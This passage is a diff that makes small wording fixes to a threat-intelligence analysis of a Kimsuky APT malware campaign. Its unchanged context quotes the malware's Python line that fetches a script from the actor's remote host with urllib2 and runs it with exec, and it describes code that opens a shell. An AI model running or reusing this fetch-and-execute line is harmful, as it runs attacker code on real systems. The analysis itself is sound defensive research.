StrangerealIntel/CyberThreatIntel/North Korea/APT/Kimsuky/2020-03-20/Analysis.md

 os.write(fd, data);
 os.close(fd)
 ```
-<h6> Finally, execute the last fileless python script for the recon actions.</h6>
+<h6>Finally, execute the last fileless python script for the recon actions.</h6>

 ```python
 exec(urllib2.urlopen(urllib2.Request('http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=v60')).read())
 ```

-<h6>The first two functions of the final python script are for execute a new shell and push the program on an infinite loop.</h6>
+<h6>The first two functions of the final python script are for executing a new shell and push the program on an infinite loop.</h6>

 ```python
 import os